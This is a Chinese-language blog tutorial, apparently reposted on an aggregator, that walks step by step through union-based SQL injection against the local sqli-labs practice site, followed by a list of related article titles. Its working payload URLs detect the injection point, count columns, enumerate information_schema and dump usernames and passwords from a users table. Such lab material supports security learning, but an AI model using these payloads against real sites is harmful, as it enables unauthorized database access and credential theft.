2. 程式人生 > 其它 >SQL注入流程

SQL注入流程

阿新 發佈:2022-03-19

1.判斷是否存在注入、以及請求方法(POST、GET、COOKIE、REQUEST、HTTP頭)

輸入單引號    '    進行檢驗是否存在輸入

http://127.0.0.1/sqli-labs-master/Less-1/index.php? id=1 '

原理:

頁面發生了報錯,說明輸入的單引號    '    影響了資料庫查詢,說明此處存在可控的引數,存在注入點

2.判斷引數型別(數字型、字元型、搜尋型、json)

輸入 and 1=2    檢驗是字元型還是數字型

http://127.0.0.1/sqli-labs-master/Less-2/index.php?  id=1  and 1=2

報錯,證明是數字型。

原理:字元型在查詢有閉合符號,如果直接將and 1=2帶入查詢,以及後後面的測試語句,都會當成字串,不會被執行。

3.閉合查詢語句

輸入{' 、}、"、)、}  單個或者組合後在家測試語句   and 1=2   加註釋符號{ # 、 --+ 、%23)

原理:

使語句能正常執行 

4.檢視這個網站所在的表有幾列

http://127.0.0.1/sqli-labs-master/Less-2/index.php? id=1 order by 3

使用二分法,如果輸入錯誤則報錯,如果存在就維持原狀。

原理:

select * from table order by n 表示select裡面的第n個欄位,從而判斷有幾行

5.進行 union select聯合查詢,發現輸出位

http://127.0.0.1/sqli-labs-master/Less-2/index.php? id=-1 union select 1,2,3 %23

發現有2個輸出位(為了union聯合查詢可以正常執行所以要使前方資訊報錯,後邊用%23進行註釋)

 原理:

UNION 操作符用於合併兩個或多個 SELECT 語句的結果集

6.查詢資料庫版本號

http://127.0.0.1/sqli-labs-master/Less-2/index.php? id=-1 union select 1,2,version() %23

  發現版本號為5.5.23(版本號5.0以上會專門生成一個叫information_schema的庫,這個庫裡有資料庫中所有表的名字)

7.查詢資料庫所擁有的表名

http://127.0.0.1/sqli-labs-master/Less-2/index.php?id=-1 union select1,2,group_concat

(table_namefrom information_schema.tables where table_schema = database() %23

 原理:

group_concat(str1, str2,...)將多個字串連線成一個字串

8.查詢出users表裡的列名

http://127.0.0.1/sqli-labs-master/Less-2/index.php? id=-1 union select 1,2,group_concat(column_name)%20from information_schema.columns where table_name ="users"%23

9.查出users表中username列中 使用者名稱和密碼

http://127.0.0.1/sqli-labs-master/Less-2/index.php? id=-1 union select 1,2, group_concat(username,password) from users %23

group_concat() 顯示查詢到所有的列

information_schema一個庫

schemata:儲存所有資料庫的名字

tables:儲存說有表的名字

columns:儲存所有欄位的名字

參考

https://www.cnblogs.com/biaochen/p/11307264.html

相關推薦

SQL注入流程

1.判斷是否存在注入、以及請求方法(POST、GET、COOKIE、REQUEST、HTTP頭) 輸入單引號    \'    進行檢驗是否存在輸入

SQL注入具體流程及相關知識

SQL注入掃盲 為了讓每一個學習注入的人完整地瞭解SQL注入,此處以Mysql Union Query(聯合查詢)注入型別來講解。瞭解Mysql注入前我們還必須先了解“information_schema”這個資料庫。為了更直觀地展示,以圖形化介面P

#SQL注入之整型注入流程#小白型|淺用

SQL注入:網站相信使用者傳入的資訊,導致執行含有命令的語句,雖然會過濾傳輸資訊,但是我們~咳咳  道高一尺魔高一丈嘛,

SQL注入問題 修改表SQL語句 檢視 觸發器 事物 儲存過程 函式 流程控制 索引

Python操作MySQL python中支援操作MySQL的模組很多 其中最常見的當屬\'pymysql\' # 屬於第三方模組

python操作MySQL,SQL注入的問題,SQL語句補充,檢視觸發器儲存過程,事務,流程控制,函式

python操作MySQL 使用過程: 引用API模組 獲取與資料庫的連線 執行sql語句與儲存過程

python之路38 SQL注入問題 索引觸發器 事務 儲存過程 函式 流程控制

SQL注入問題 怪像1:輸對使用者名稱就可以登入成功 怪像2:不需要對的使用者名稱和密碼也可以登入成功

sql注入、事物、索引、流程控制

目錄 SQL注入問題 檢視 觸發器 事務 儲存過程 函式 流程控制 索引相關概念 索引資料結構

SQL注入問題 觸發器 檢視 事物 函式 流程 儲存過程 索引

python 中SQL注入問題 在python 用pymysql基於資料庫 來操作使用者登入的時候會遇到一些問題。

SQL注入、檢視、觸發器、事務、儲存過程、函式、流程控制、索引

目錄 一、SQL注入問題 (1)現象一:輸對使用者名稱即可登入 (2)現象二:不需要對的使用者名稱和密碼也可以登陸成功

sql注入原理及防範

前言         sql注入是一種危險係數較高的攻擊方式,現在由於我們持久層框架越來越多,大部分框架會處理這個問題,因此導致我們對它的關注度越來越少了。最近部門在整理安全漏洞時,提到了一些關於sql注入的修改

MyBatis執行Sql流程例項解析

這篇文章主要介紹了MyBatis執行Sql流程例項解析,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

詳解SQL注入--安全(二)

如果此文章有什麼錯誤,或者您有什麼建議,歡迎隨時聯絡我,謝謝! 寫在前面:在前兩天初學SQL注入的基礎上,繼續在Metasploitable-Linux環境下進行練習。

關於sql注入的簡要演示(入坑拋磚)

首先可能大家都會問什麼是sql? Sql是資料庫的一種型別,是用來儲存網站資料的。

淺談一次與sql注入 & webshell 的美麗“邂逅”

引言 一波未平,一波又起。金融公司的業務實在是太引人耳目,何況我們公司的業處正處於風口之上(區塊鏈金融),並且每天有大量現金交易,所以不知道有多少躲在暗處一直在盯著你的系統,讓你防不勝防,並且想方設法的

pymysql如何解決sql注入問題深入講解

1. SQL 注入 SQL 注入是非常常見的一種網路攻擊方式,主要是通過引數來讓 mysql 執行 sql 語句時進行預期之外的操作。

使用PDO防sql注入的原理分析

前言 本文使用pdo的預處理方式可以避免sql注入。下面話不多說了,來一起看看詳細的介紹吧

SQL注入的2個小Trick及示例總結

前言 最近發現了兩個關於sql注入的小trick,分享一下.下面話不多說了,來一起看看詳細的介紹吧

SQL注入技巧之顯注與盲注中過濾逗號繞過詳析

前言 sql注入在很早很早以前是很常見的一個漏洞。後來隨著安全水平的提高,sql注入已經很少能夠看到了。但是就在今天,還有很多網站帶著sql注入漏洞在執行。下面這篇文章主要介紹了關於SQL注入逗號繞過的相關內容,分

深入瞭解SQL注入

1 .什麼是sql注入Sql injection)? Sql注入是一種將sql程式碼新增到輸入引數中,傳遞到Sql伺服器解析並執行的一種攻擊手法

使用keras做SQL注入攻擊的判斷(例項講解)

本文是通過深度學習框架keras來做SQL注入特徵識別, 不過雖然用了keras,但是大部分還是普通的神經網路,只是外加了一些規則化、dropout層(隨著深度學習出現的層)。